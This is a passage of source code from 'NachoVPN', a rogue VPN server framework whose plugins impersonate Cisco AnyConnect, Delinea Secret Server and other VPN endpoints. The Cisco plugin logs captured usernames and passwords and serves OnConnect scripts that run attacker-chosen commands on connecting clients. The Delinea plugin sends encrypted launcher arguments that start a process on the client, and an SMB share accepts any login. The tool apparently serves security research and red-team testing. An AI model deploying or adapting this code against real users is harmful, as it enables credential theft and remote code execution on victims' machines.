self.parse_request(): # Delegate HTTP processing to PluginManager if self.server.plugin_manager.handle_http(self): return # No plugin handled the request, send 404 logging.warning(f"Unhandled HTTP request from {self.client_address[0]}") with open(os.path.join(os.path.dirname(__file__), '..', 'plugins', 'base', 'templates', '404.html'), 'rb') as f: self.send_response(404) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(f.read()) else: # Handle raw VPN data if not self.server.plugin_manager.handle_data(first_line, self.connection, self.client_address[0]): logging.warning(f"Unhandled raw VPN data from {self.client_address[0]}: {first_line}") self.connection.close() except Exception as e: logging.error(f"Error processing request from {self.client_address[0]}: {e}") self.connection.close() def log_message(self, format, *args): plugin_name = getattr(self, 'plugin_name', 'Default') logging.info(f"[{plugin_name}] {self.client_address[0]} - - {format % args}") ================================================ FILE: src/nachovpn/core/smb_manager.py ================================================ from impacket.smbserver import SimpleSMBServer import os import stat import logging import threading # SMB configuration SMB_ENABLED = os.getenv("SMB_ENABLED", "false").lower() == "true" SMB_SHARE_NAME = os.getenv("SMB_SHARE_NAME", "SHARE") SMB_SHARE_PATH = os.getenv("SMB_SHARE_PATH", "smb") class SMBManager: def __init__(self): self.logger = logging.getLogger(__name__) self.server = None if SMB_ENABLED: self._setup_smb_server() def auth_callback(self, *args, **kwargs): """Authentication callback""" self.logger.debug(f"Authenticate message: {args} {kwargs}") return True def _setup_smb_server(self): """Set up the SMB server""" try: # Create share directory if it doesn't exist os.makedirs(SMB_SHARE_PATH, exist_ok=True) # Impacket's readOnly flag is not implemented, so make the directory read-only os.chmod(SMB_SHARE_PATH, stat.S_IREAD | stat.S_IEXEC) # Initialize SMB server self.server = SimpleSMBServer("0.0.0.0", 445) # Add share self.server.addShare(SMB_SHARE_NAME.upper(), SMB_SHARE_PATH, shareComment='Nacho SMB Share', readOnly='yes') # Enable SMBv2 self.server.setSMB2Support(True) # Start SMB server in a separate thread smb_thread = threading.Thread(target=self.server.start, daemon=True) smb_thread.start() self.logger.info(f"Started SMB server with share '{SMB_SHARE_NAME}' at {SMB_SHARE_PATH}") except Exception as e: self.logger.error(f"Failed to start SMB server: {e}") self.server = None ================================================ FILE: src/nachovpn/core/utils.py ================================================ from scapy.all import IP, IPv6, ARP, UDP, TCP, Ether, rdpcap, wrpcap, \ srp, sendp, conf, get_if_addr, get_if_hwaddr, getmacbyip, sniff import os import logging class PacketHandler: """ TODO: Implement a NAT-based packet handler where the plugin provides a callback function that is called when a packet is received back from its destination and written to the client tunnel. """ def __init__(self, write_pcap=False, pcap_filename=None, logger_name="PacketHandler"): self.write_pcap = write_pcap self.pcap_filename = pcap_filename self.logger = logging.getLogger(logger_name) if self.write_pcap and pcap_filename is not None: os.makedirs(os.path.dirname(pcap_filename), exist_ok=True) def get_free_nat_port(self): return 0 def forward_tcp_packet(self, packet_data): src_ip = packet[IP].src dst_ip = packet[IP].dst sport = packet[TCP].sport dport = packet[TCP].dport self.logger.debug(f"Processing TCP packet: {src_ip}:{sport} -> {dst_ip}:{dport}") # Get a unique NAT port for this connection nat_port = self.get_free_nat_port() # Modify packet for NAT packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP packet[TCP].sport = nat_port # Replace source port with NAT port self.logger.debug(f"New connection: {src_ip}:{sport} -> {dst_ip}:{dport} (NAT port: {nat_port})") # Modify packet for NAT packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP packet[TCP].sport = nat_port # Replace source port with NAT port # Recalculate checksums del packet[IP].chksum del packet[TCP].chksum # Send the packet out sendp(packet, verbose=False, iface=conf.iface) def packet_sniffer(self): def packet_callback(packet): try: if IP not in packet: return # TODO: restore original IP and TCP ports if self.receive_callback: self.receive_callback(packet) except Exception as e: self.logger.error(f"Error processing packet: {e}") self.logger.info('Starting packet sniffer') sniff(iface=conf.iface, prn=packet_callback, store=False) def handle_client_packet(self, packet_data): packet = IP(packet_data) self.logger.info(f"Received packet: {packet}") self.append_to_pcap(packet) def append_to_pcap(self, packet): try: if self.write_pcap and self.pcap_filename is not None: # Add fake layer 2 data to the packet, if missing if not packet.haslayer(Ether): src_mac = get_if_hwaddr(conf.iface) fake_ether = Ether(src=src_mac, dst=None) packet = fake_ether / packet wrpcap(self.pcap_filename, packet, append=True) except Exception as e: logging.error(f'Error appending to PCAP: {e}') ================================================ FILE: src/nachovpn/plugins/__init__.py ================================================ from nachovpn.plugins.base.plugin import VPNPlugin from nachovpn.plugins.paloalto.plugin import PaloAltoPlugin from nachovpn.plugins.cisco.plugin import CiscoPlugin from nachovpn.plugins.sonicwall.plugin import SonicWallPlugin from nachovpn.plugins.pulse.plugin import PulseSecurePlugin from nachovpn.plugins.netskope.plugin import NetskopePlugin from nachovpn.plugins.delinea.plugin import DelineaPlugin from nachovpn.plugins.example.plugin import ExamplePlugin __all__ = [ 'VPNPlugin', 'PaloAltoPlugin', 'CiscoPlugin', 'SonicWallPlugin', 'PulseSecurePlugin', 'NetskopePlugin', 'DelineaPlugin', 'ExamplePlugin' ] ================================================ FILE: src/nachovpn/plugins/base/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/base/plugin.py ================================================ from flask import Flask, jsonify from jinja2 import Environment, FileSystemLoader import logging import os class VPNPlugin: def __init__(self, cert_manager=None, external_ip=None, dns_name=None, db_manager=None, template_dir=None, packet_handler=None, **kwargs): self.enabled = True self.cert_manager = cert_manager self.external_ip = external_ip self.dns_name = dns_name self.db_manager = db_manager self.template_dir = template_dir self.packet_handler = packet_handler self.logger = logging.getLogger(self.__class__.__name__) # setup Flask app self.flask_app = Flask(__name__) self._setup_routes() # Set up Jinja2 environment if template_dir is provided default_dir = os.path.join(os.path.dirname(__file__), 'templates') if template_dir: self.template_env = Environment(loader=FileSystemLoader([template_dir, default_dir])) else: self.template_env = Environment(loader=FileSystemLoader(default_dir)) def is_enabled(self): return self.enabled def get_thumbprint(self): thumbprint = self.cert_manager.server_thumbprint if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true': dynamic_thumbprint = self.cert_manager.get_thumbprint_from_server(self.dns_name) if dynamic_thumbprint: self.logger.debug(f"Using dynamic thumbprint for {self.dns_name}: {dynamic_thumbprint}") thumbprint = dynamic_thumbprint return thumbprint def _setup_routes(self): # Define Flask routes within the class @self.flask_app.route('/api/v1/healthcheck', methods=['GET']) def healthcheck(): return jsonify({"message": "OK"}) @self.flask_app.errorhandler(404) def page_not_found(e): return self.render_template('404.html'), 404 def _send_flask_response(self, response, handler): # Send the Flask response back to the client handler.send_response(response.status_code) for header, value in response.headers: handler.send_header(header, value) handler.end_headers() handler.wfile.write(response.data) def handle_get(self, handler): with self.flask_app.test_client() as client: response = client.get(handler.path, headers=dict(handler.headers)) self._send_flask_response(response, handler) return True def handle_post(self, handler): content_length = int(handler.headers.get('Content-Length', 0)) body = handler.rfile.read(content_length) # Use Flask's test_client to handle the request with self.flask_app.test_client() as client: response = client.post(handler.path, data=body, headers=dict(handler.headers)) self._send_flask_response(response, handler) return True def render_template(self, template_name, **context): """Render a template with the given context""" if not hasattr(self, 'template_env'): raise Exception("No template environment configured") template = self.template_env.get_template(template_name) return template.render(**context) def can_handle_data(self, data, client_socket, client_ip): """Check if this plugin can handle the given data""" return False def can_handle_http(self, handler): """Determine if this plugin can handle the HTTP request""" return False def handle_data(self, data, client_socket, client_ip): return False def handle_http(self, handler): if handler.command == 'GET': return self.handle_get(handler) elif handler.command == 'POST': return self.handle_post(handler) return False def log_credentials(self, username, password, other_data=None): """Helper method to log credentials to the database.""" if self.db_manager: self.db_manager.log_credentials( username=username, password=password, plugin_name=self.__class__.__name__, other_data=other_data ) def _wrap_packet(self, packet_data, client): """Wrap the packet data with the plugin's specific protocol.""" return packet_data ================================================ FILE: src/nachovpn/plugins/base/templates/404.html ================================================ 404 Not Found

404 Not Found


================================================ FILE: src/nachovpn/plugins/cisco/__init__.py ================================================ from .plugin import CiscoPlugin __all__ = [ 'CiscoPlugin' ] ================================================ FILE: src/nachovpn/plugins/cisco/files/OnConnect.sh ================================================ #!/bin/bash {{ cisco_command_macos }} ================================================ FILE: src/nachovpn/plugins/cisco/files/OnConnect.vbs ================================================ Set oShell = CreateObject("WScript.Shell") oShell.run "%comspec% /c {{ cisco_command_win }}" ================================================ FILE: src/nachovpn/plugins/cisco/files/OnDisconnect.vbs ================================================ ' OnDisconnect.vbs ================================================ FILE: src/nachovpn/plugins/cisco/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Response, abort, request from jinja2 import Template import logging import hashlib import re import os # https://datatracker.ietf.org/doc/html/draft-mavrogiannopoulos-openconnect-02 class CTSP: class Constants: MAGIC_NUMBER = 0x53544601 HEADER_LENGTH = 8 class PacketType: DATA = 0x00 DPD_REQ = 0x03 DPD_RESP = 0x04 DISCONNECT = 0x05 KEEPALIVE = 0x07 COMPRESSED_DATA = 0x08 TERMINATE = 0x09 def __init__(self, socket, packet_handler=None, connection_id=None): self.socket = socket self.packet_handler = packet_handler self.connection_id = connection_id @staticmethod def create_packet(packet_type, data=b''): resp = CTSP.Constants.MAGIC_NUMBER.to_bytes(4, 'big') resp += (len(data)).to_bytes(2, 'big') resp += packet_type.to_bytes(1, 'big') resp += b'\x00' resp += data return resp # Section 2.5: The Keepalive and Dead Peer Detection Protocols def send_dpd_resp(self, req_data): # Send a DPD-RESP packet back to the client # and attach any additional data from the DPD-REQ packet resp = self.create_packet(self.PacketType.DPD_RESP, req_data) logging.info(f"Sending DPD-RESP: {resp.hex()}") self.socket.sendall(resp) def send_keepalive(self): # Just send a KEEPALIVE packet back to the client resp = self.create_packet(self.PacketType.KEEPALIVE) logging.info(f"Sending KEEPALIVE: {resp.hex()}") self.socket.sendall(resp) def parse(self, data): try: if int.from_bytes(data[0:4], byteorder='big') != self.Constants.MAGIC_NUMBER: raise Exception("Invalid packet") packet_length = int.from_bytes(data[4:6], byteorder='big') packet_type = data[6] if len(data) - self.Constants.HEADER_LENGTH != packet_length: raise Exception(f"Invalid packet length: {packet_length}") packet_data = data[self.Constants.HEADER_LENGTH:] if packet_type == self.PacketType.DATA: # Check if the packet is a valid IPv4 packet if len(packet_data) >= 20 and (packet_data[0] >> 4) == 4 and self.packet_handler is not None: logging.debug(f"Received valid IPv4 packet") # Handle packet with the packet handler self.packet_handler.handle_client_packet( packet_data, self.connection_id ) elif packet_type == self.PacketType.DISCONNECT: logging.info(f"Received disconnect packet. Message: {packet_data[1:].decode()}") elif packet_type == self.PacketType.DPD_REQ: logging.info(f"Received DPD-REQ packet. Replying with DPD-RESP") self.send_dpd_resp(packet_data) elif packet_type == self.PacketType.KEEPALIVE: logging.info(f"Received keepalive packet") self.send_keepalive() elif packet_type == self.PacketType.COMPRESSED_DATA: logging.info(f"Received compressed packet") elif packet_type == self.PacketType.TERMINATE: logging.info(f"Received terminate packet") else: logging.warning(f"Unknown packet type: {packet_type:04x}") logging.warning(f"Packet data: {packet_data.hex()}") except Exception as e: logging.error(f"Error parsing packet: {e}") class CiscoPlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) self.vpn_name = os.getenv("VPN_NAME", "NachoVPN") self.files_dir = os.path.join(os.path.dirname(__file__), "files") self.cisco_command_win = os.getenv("CISCO_COMMAND_WIN", "calc.exe") self.cisco_command_macos = os.getenv("CISCO_COMMAND_MACOS", "touch /tmp/pwnd") def shasum(self, data): if isinstance(data, str): data = data.encode() return hashlib.sha1(data).hexdigest().upper() def handle_http(self, handler): if handler.command == 'GET': self.handle_get(handler) elif handler.command == 'POST': self.handle_post(handler) elif handler.command == 'HEAD': self.handle_head(handler) elif handler.command == 'CONNECT': self.handle_connect(handler) return True def render_file(self, filename, context): with open(filename, "r") as f: template = Template(f.read()) return template.render(context) def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() @self.flask_app.route('/CACHE/stc/profiles/profile.xml', methods=['GET']) def profile(): self.logger.info("Loading profile file") xml = self.render_template("profile.xml") response = xml.encode() return Response(response, status=200, mimetype='text/html') @self.flask_app.route('/+CSCOT+/oem-customization', methods=['GET']) def oem_customization(): self.logger.info("Handling OEM customization") name = request.args.get('name') script_path = os.path.join(self.files_dir, os.path.basename(name.lstrip('scripts_'))) context = { 'cisco_command_win': self.cisco_command_win, 'cisco_command_macos': self.cisco_command_macos } if name and os.path.exists(script_path): content = self.render_file(script_path, context) return Response(content, status=200, mimetype="application/octet-stream") return abort(404) @self.flask_app.route('/', methods=['POST']) def post(): self.logger.info("Handling POST") headers = {'X-Aggregate-Auth': '1'} body = request.get_data().decode() if 'type="init"' in body: self.logger.info("Handling INIT") xml = self.render_template("prelogin.xml", vpn_name=self.vpn_name) self.logger.info(f"Sending prelogin.xml") response = xml.encode() return Response(response, status=200, mimetype='text/html', headers=headers) elif 'type="auth-reply"' in body: self.logger.info("Handling AUTH-REPLY") username = re.search('(.*)', body).group(1) password = re.search('(.*)', body).group(1) self.logger.info(f"Received username: {username} and password: {password}") info = {'User-Agent': request.headers.get('User-Agent')} self.db_manager.log_credentials( username, password, self.__class__.__name__, info ) self.logger.info("Sending auth reply") # Calculate hashes profile_xml = self.render_template("profile.xml") profile_hash = self.shasum(profile_xml) # build a table of hashes for the script files script_hashes = [ {'platform': "win", 'filename': "OnDisconnect.vbs", 'hash': None}, {'platform': "win", 'filename': "OnConnect.vbs", 'hash': None}, {'platform': "mac-intel", 'filename': "OnDisconnect.sh", 'hash': None}, {'platform': "mac-intel", 'filename': "OnConnect.sh", 'hash': None} ] # iterate over the script_hashes and calculate the hash for each file for script in script_hashes: script_path = os.path.join(self.files_dir, script['filename']) context = { 'cisco_command_win': self.cisco_command_win, 'cisco_command_macos': self.cisco_command_macos } if os.path.exists(script_path): content = self.render_file(script_path, context) script['hash'] = self.shasum(content) xml = self.render_template("login.xml", server_cert_hash=self.get_thumbprint()['sha1'], profile_hash=profile_hash, script_hashes=script_hashes ) response = xml.encode() return Response(response, status=200, mimetype='text/html', headers=headers) return abort(404) def handle_head(self, handler): handler.send_response(200) def handle_connect(self, handler): self.logger.info(f"Handling CONNECT for {handler.path}") try: # Create a new session and get the connection_id connection_id, ip_address = self.packet_handler.create_session(handler.connection, self._wrap_packet) session_id = hashlib.sha256(connection_id.encode()).hexdigest().upper() hostname = f"{connection_id[:8]}.nachovpn.local" self.logger.debug(f"Connection ID: {connection_id}, IP Address: {ip_address}, Session ID: {session_id}, Hostname: {hostname}") # Send headers headers = [ b"HTTP/1.1 200 OK", b"X-CSTP-Version: 1", b"X-CSTP-Protocol: Copyright (c) 2004 Cisco Systems, Inc.", f"X-CSTP-Address: {ip_address}".encode(), b"X-CSTP-Netmask: 255.255.255.0", f"X-CSTP-Hostname: {hostname}".encode(), b"X-CSTP-Lease-Duration: 1209600", b"X-CSTP-Session-Timeout: none", b"X-CSTP-Session-Timeout-Alert-Interval: 60", b"X-CSTP-Session-Timeout-Remaining: none", b"X-CSTP-Idle-Timeout: 1800", b"X-CSTP-DNS: 8.8.8.8", b"X-CSTP-Disconnected-Timeout: 1800", #b"X-CSTP-Split-Include: 10.10.0.0/255.255.255.0", b"X-CSTP-Keep: true", b"X-CSTP-Tunnel-All-DNS: true", b"X-CSTP-DPD: 0", b"X-CSTP-Keepalive: 0", b"X-CSTP-MSIE-Proxy-Lockdown: false", b"X-CSTP-Smartcard-Removal-Disconnect: true", f"X-DTLS-Session-ID: {session_id}".encode(), b"X-DTLS-Port: 80", b"X-DTLS-Keepalive: 0", b"X-DTLS-DPD: 0", b"X-CSTP-MTU: 1400", b"X-DTLS-MTU: 1400", b"X-DTLS12-CipherSuite: ECDHE-RSA-AES256-GCM-SHA384", b"X-CSTP-Routing-Filtering-Ignore: false", b"X-CSTP-Quarantine: false", b"X-CSTP-Disable-Always-On-VPN: false", b"X-CSTP-Client-Bypass-Protocol: false", b"X-CSTP-TCP-Keepalive: false", b"", b"" ] handler.wfile.write(b"\r\n".join(headers)) handler.wfile.flush() # Create CTSP parser parser = CTSP(handler.connection, packet_handler=self.packet_handler, connection_id=connection_id) # Just keep reading from the client forever while True: try: data = handler.connection.recv(8192) if not data: self.logger.info('Connection closed by client') break # Parse the packet data parser.parse(data) except Exception as e: self.logger.error(f"Connection error: {e}") break except Exception as e: self.logger.error(f"CONNECT error: {e}") finally: self.logger.info("Closing CONNECT tunnel") self.packet_handler.destroy_session(connection_id) handler.connection.close() def _wrap_packet(self, packet_data, client): return CTSP.create_packet(CTSP.PacketType.DATA, packet_data) def can_handle_data(self, data, client_socket, client_ip): return len(data) >= 4 and CTSP.Constants.MAGIC_NUMBER == int.from_bytes(data[:4], byteorder='big') def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'AnyConnect' in user_agent: return True return False def handle_data(self, data, client_socket, client_ip): try: connection_id, _ = self.packet_handler.create_session(client_socket, self._wrap_packet) parser = CTSP(client_socket, packet_handler=self.packet_handler, connection_id=connection_id) parser.parse(data) except Exception as e: self.logger.error(f"Error handling Cisco data: {e}") finally: self.packet_handler.destroy_session(connection_id) client_socket.close() return True ================================================ FILE: src/nachovpn/plugins/cisco/templates/login.xml ================================================ 106496 61D5E0@106496@2C64@1A03AA09D5B053ED6F58D56ABDF4EA125F12956C ssl-dhe /CACHE/stc/1 {{ server_cert_hash }} xml AnyConnect VPN Profile false VpnMgmtTunProfile.xml vpnm Profile\MgmtTun Profile\MgmtTun AnyConnect Management VPN Profile false configuration.xml nsp Network Access Manager\system Network Access Manager\newConfigFiles NAM Service Profile false CustomerExperience_Feedback.xml fsp CustomerExperienceFeedback CustomerExperienceFeedback Feedback Service Profile false ISEPostureCFG.xml isp ISE Posture ISE Posture ISE Posture Profile false ISEPosture.json json ISE Posture ISE Posture ISE Posture JSON Profile false AMPEnabler_ServiceProfile.xml asp AMPEnabler AMPEnabler AMP Enabler Service Profile false NVM_ServiceProfile.xml nvmsp NVM NVM Network Visibility Service Profile false OrgInfo.json json Umbrella Umbrella Umbrella Roaming Security Profile false 3,9,04053 binaries/anyconnect-win-5.9.04053-core-vpn-webdeploy-k9.msi AnyConnect Secure Mobility Client binaries/anyconnect-win-4.9.04053-dart-webdeploy-k9.msi AnyConnect DART binaries/anyconnect-win-4.9.04053-posture-webdeploy-k9.msi AnyConnect Posture binaries/anyconnect-win-4.9.04053-gina-webdeploy-k9.msi AnyConnect SBL binaries/anyconnect-win-4.9.04053-nam-webdeploy-k9.msi AnyConnect Network Access Manager binaries/anyconnect-win-4.9.04053-nvm-webdeploy-k9.msi AnyConnect Network Visibility binaries/anyconnect-win-4.9.04053-amp-webdeploy-k9.msi AnyConnect AMP Enabler binaries/anyconnect-win-4.9.04053-iseposture-webdeploy-k9.msi AnyConnect ISE Posture binaries/anyconnect-win-4.9.04053-umbrella-webdeploy-k9.msi AnyConnect Umbrella Roaming Security /CACHE/stc/profiles/profile.xml {{ profile_hash }} {%- for script in script_hashes -%} {%- if script['hash'] %} scripts_{{ script['filename'] }} {{ script['hash'] }} {%- endif -%} {%- endfor %} ================================================ FILE: src/nachovpn/plugins/cisco/templates/prelogin.xml ================================================ VPN2 864640002 multiple-cert single-sign-on {{ vpn_name }} 1619719004259
================================================ FILE: src/nachovpn/plugins/cisco/templates/profile.xml ================================================ false false false All All All false Native false 30 false true false true true IPv4 false ReconnectAfterResume false false Automatic SingleLocalLogon SingleLocalLogon AllowRemoteUsers LocalUsersOnly false Disable true false true false 20 4 false false true ================================================ FILE: src/nachovpn/plugins/delinea/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/delinea/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import request, abort, Response from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import rsa, padding from cryptography.hazmat.backends import default_backend import xml.etree.ElementTree as ET from urllib.parse import quote import os import uuid import base64 import secrets import json """ # Requests: ## GetLauncherArguments 748294fc-9527-4182-a47b-81fcaf99f473 0 ## GetSymmetricKey 748294fc-9527-4182-a47b-81fcaf99f473 BgIAAACkAABSU0ExAAQAAAEAAQDddOOABJmRVvrS5SIrFiANNGkdYu0/ii0bp6k2NVVeymFpB9+ohAmPGqCsowJkGesV3zzGakFvuGzS3H5TVKTTK8T0idFRSfxWVihUv/7b9f50B8GTWpPFTYkCCneGD5hxYyPmwPNiNgoE9FsZCLyrffAzioSotZS2xeBZfaSzog== """ SECRET_SERVER_XML_NS = { "soap": "http://www.w3.org/2003/05/soap-envelope", "urn": "urn:thesecretserver.com" } class DelineaPlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) # Store session keys for each GUID self.session_keys = {} def _generate_aes_keys(self): """Generate AES-256 key and IV""" aes_key = secrets.token_bytes(32) # 256-bit key aes_iv = secrets.token_bytes(16) # 128-bit IV return aes_key, aes_iv def _aes_encrypt(self, data, key, iv): """Encrypt data with AES-256-CBC""" cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()) encryptor = cipher.encryptor() # Pad data to 16-byte boundary padding_length = 16 - (len(data) % 16) padded_data = data + bytes([padding_length] * padding_length) encrypted_data = encryptor.update(padded_data) + encryptor.finalize() return encrypted_data def _decode_rsa_public_key(self, public_key_blob): """Decode RSA public key from Microsoft format""" try: # Decode base64 key_data = base64.b64decode(public_key_blob) # Microsoft RSA key format (all values in little-endian): # PUBLICKEYSTRUC (8 bytes): # - bType: 0x06 (PUBLICKEYBLOB) # - bVersion: 0x02 # - reserved: 0x0000 # - aiKeyAlg: 0x0000A400 (CALG_RSA_KEYX) # RSAPUBKEY (12 bytes): # - magic: 0x31415352 ("RSA1") # - bitlen: key length in bits (little-endian) # - pubexp: public exponent (little-endian, usually 65537) # modulus[bitlen/8]: modulus data if len(key_data) < 20: # Minimum size for header + RSAPUBKEY self.logger.error("Key blob too short") return None # Check for PUBLICKEYBLOB type if key_data[0] != 0x06: self.logger.error(f"Invalid blob type: {key_data[0]} (expected 0x06)") return None # Check for RSA1 magic if key_data[8:12] != b'RSA1': self.logger.error("Invalid RSA magic") return None # Read bitlen (little-endian) bitlen = int.from_bytes(key_data[12:16], byteorder='little') # Read pubexp (little-endian) pubexp = int.from_bytes(key_data[16:20], byteorder='little') # Calculate modulus length modulus_len = bitlen // 8 # Extract modulus (starts at byte 20) if len(key_data) < 20 + modulus_len: self.logger.error("Key blob too short for modulus") return None modulus_bytes = key_data[20:20+modulus_len] # Convert to integers (both little-endian according to Microsoft docs) modulus = int.from_bytes(modulus_bytes, byteorder='little') exponent = pubexp # Debug logging self.logger.debug(f"Parsed RSA key - Bitlen: {bitlen}, Modulus length: {len(modulus_bytes)}, Exponent: {exponent}") self.logger.debug(f"Modulus bytes (first 16): {modulus_bytes[:16].hex()}") self.logger.debug(f"Exponent bytes: {exponent.to_bytes(4, 'little').hex()}") # Validate exponent if exponent < 3: self.logger.error(f"Invalid RSA exponent: {exponent} (must be >= 3)") return None if exponent >= modulus: self.logger.error(f"Invalid RSA exponent: {exponent} (must be < modulus)") return None # Create RSA public key public_key = rsa.RSAPublicNumbers(exponent, modulus).public_key(backend=default_backend()) self.logger.debug(f"Successfully decoded RSA key: {bitlen}-bit key, exponent={exponent}") return public_key except Exception as e: self.logger.error(f"Failed to decode RSA public key: {e}") return None def _rsa_encrypt(self, data, public_key): """Encrypt data with RSA using the provided public key""" try: encrypted_data = public_key.encrypt( data, padding.OAEP( mgf=padding.MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None ) ) return encrypted_data except Exception as e: self.logger.error(f"Failed to encrypt with RSA: {e}") return None def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() # Add additional routes specific to this plugin @self.flask_app.route('/', methods=['GET']) @self.flask_app.route('/delinea', methods=['GET']) def index(): guid = str(uuid.uuid4()) session_guid = str(uuid.uuid4()) url_encoded = quote(f"https://{self.dns_name}/SecretServer/Rdp/V1/rdpwebservice.asmx", safe='') xml = self.render_template('index.html', guid=guid, session_guid=session_guid, url_encoded=url_encoded) return Response(xml, mimetype='text/html') @self.flask_app.route('/SecretServer/Rdp//rdpwebservice.asmx', methods=['POST']) @self.flask_app.route('/secretserver/rdp//rdpwebservice.asmx', methods=['POST']) def rdpwebservice(version): self.logger.debug(request.data) if b'GetLauncherArguments' in request.data: # Extract GUID from request root = ET.fromstring(request.data) guid = root.find(".//urn:guid", SECRET_SERVER_XML_NS).text self.logger.debug(f"Extracted GUID: {guid}") # Generate AES keys for this session aes_key, aes_iv = self._generate_aes_keys() self.logger.debug(f"Generated AES key={aes_key.hex()}, IV={aes_iv.hex()}") # Store keys for later use self.session_keys[guid] = { 'aes_key': aes_key, 'aes_iv': aes_iv } # Create launcher arguments launcher_data = json.dumps({ "Domain": "aaa.com", "WinProcessName": "calc.exe", "WinProcessArgs": "", "WinLaunchAsUser": False, "WinFileToRun": "", "UseWindowFormFiller": False, "WinLoadUserProfile": False, "WinUseShellExecute": False, "Processname": "", "LaunchAsUser": False, "UseShellExecute": False, "ProcessArgs": None, "FileToRun": "", "WindowsEscapeCharacter": None, "WindowsCharactersToEscape": None, "RecordMultipleWindows": True, "AdditionalProcessesToRecord": None, "UseSSHTunnel": False, "ProcessTunnelArgs": None, "WinProcessTunnelArgs": "", "TunnelRemoteHost": None, "TunnelRemotePort": None, "UseSshProxy": False, "SshProxyHost": None, "SshProxyPort": 0, "SshProxyUsername": None, "SshProxyPassword": None, "SshPublicKeyFingerPrint": None, "PreserveClientProcess": False, "SessionToken": None, "SessionExpiresInSeconds": None, "SessionRefreshToken": None, "SSHPrivateKeyOpenSSH": None, "EnableSSHVideoRecording": False, "Username": "aaa", "Password": "aaa", "record": False, "hideRecordingIndicator": True, "sessionkey": guid, "sessionCallbackIntervalSeconds": 60, "fipsEnabled": False, "Machine": None, "Url": None, "Server": None, "FingerprintSHA1String": None, "FingerprintSHA512String": None, "Host": None, "Port": 0, "SSHPrivateKey": None, "SSHPrivateKeyPassPhrase": None, "MaxSessionLength": 24, "InactivityTimeoutMinutes": 120, "IsRDSSession": False, "RecordRDSKeystrokes": False, "CredentialProxyType": None, "Target": "" }) encrypted_launcher_data = self._aes_encrypt(launcher_data.encode('utf-16-le'), aes_key, aes_iv) launcher_args = encrypted_launcher_data.hex() xml = self.render_template('GetLauncherArguments.xml', launcher_args=launcher_args) return Response(xml, mimetype='text/xml') elif b'GetSymmetricKey' in request.data: # Extract the public key and GUID root = ET.fromstring(request.data) guid = root.find(".//urn:guid", SECRET_SERVER_XML_NS).text public_key_blob = root.find(".//urn:publicKeyBlob", SECRET_SERVER_XML_NS).text # Get stored session keys for this GUID if guid not in self.session_keys: self.logger.error(f"No session keys found for GUID: {guid}") return abort(400) session_data = self.session_keys[guid] aes_key = session_data['aes_key'] aes_iv = session_data['aes_iv'] # Decode and load RSA public key public_key = self._decode_rsa_public_key(public_key_blob) if not public_key: return abort(400) # Generate session keys session_key = secrets.token_bytes(32) session_iv = secrets.token_bytes(16) # Encrypt the keys with RSA encrypted_aes_key = self._rsa_encrypt(aes_key, public_key) encrypted_aes_iv = self._rsa_encrypt(aes_iv, public_key) encrypted_session_key = self._rsa_encrypt(session_key, public_key) encrypted_session_iv = self._rsa_encrypt(session_iv, public_key) if not all([encrypted_aes_key, encrypted_aes_iv, encrypted_session_key, encrypted_session_iv]): return abort(500) # Base64 encode the encrypted keys keys = { 'aes_key': base64.b64encode(encrypted_aes_key).decode('utf-8'), 'aes_iv': base64.b64encode(encrypted_aes_iv).decode('utf-8'), 'session_key': base64.b64encode(encrypted_session_key).decode('utf-8'), 'session_iv': base64.b64encode(encrypted_session_iv).decode('utf-8') } xml = self.render_template('GetSymmetricKey.xml', **keys) return Response(xml, mimetype='text/xml') elif b'UpdateStatusV2' in request.data: xml = self.render_template('UpdateStatusV2.xml') return Response(xml, mimetype='text/xml') elif b'GetNextProtocolHandlerVersion' in request.data: xml = self.render_template('GetNextProtocolHandlerVersion.xml') return Response(xml, mimetype='text/xml') return abort(404) def handle_http(self, handler): if handler.command == 'GET': self.handle_get(handler) elif handler.command == 'POST': self.handle_post(handler) return True def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') return handler.headers.get('vault-application') \ or handler.path == '/delinea' \ or handler.path == '/rdpwebservice.asmx' \ or 'Thycotic' in user_agent \ or 'MS Web Services Client Protocol' in user_agent ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetLauncherArguments.xml ================================================ {{ launcher_args }} ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetNextProtocolHandlerVersion.xml ================================================ 6.0.3.39 ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetSymmetricKey.xml ================================================ {{ aes_key }} {{ aes_iv }} {{ session_key }} {{ session_iv }} ================================================ FILE: src/nachovpn/plugins/delinea/templates/UpdateStatusV2.xml ================================================ false false false ================================================ FILE: src/nachovpn/plugins/delinea/templates/index.html ================================================ ================================================ FILE: src/nachovpn/plugins/example/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/example/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Flask, jsonify, request import logging class ExamplePlugin(VPNPlugin): def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() # Add additional routes specific to this plugin @self.flask_app.route('/api/v2/healthcheck', methods=['GET']) def healthcheck_v2(): return jsonify({"message": "OK"}) def can_handle_http(self, handler): return handler.path in ['/api/v2/healthcheck'] def can_handle_data(self, data, client_socket, client_ip): logging.info(f"ExamplePlugin::can_handle_data: Received data from {client_ip}: {data.hex()}") return len(data) >= 4 and b"PING" in data[:4] def handle_data(self, data, client_socket, client_ip): 